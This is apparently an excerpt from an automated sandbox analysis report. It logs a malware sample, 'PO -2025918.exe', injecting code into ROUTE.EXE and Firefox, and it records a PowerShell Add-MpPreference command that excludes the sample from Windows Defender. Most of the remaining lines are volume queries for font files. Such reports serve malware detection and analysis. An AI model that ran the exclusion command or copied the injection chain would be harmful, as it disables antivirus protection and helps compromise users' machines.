Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\ROUTE.EXE Thread register set: target process: 2892 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\ROUTE.EXE Thread APC queued: target process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe" Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE" Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Users\user\Desktop\PO -2025918.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
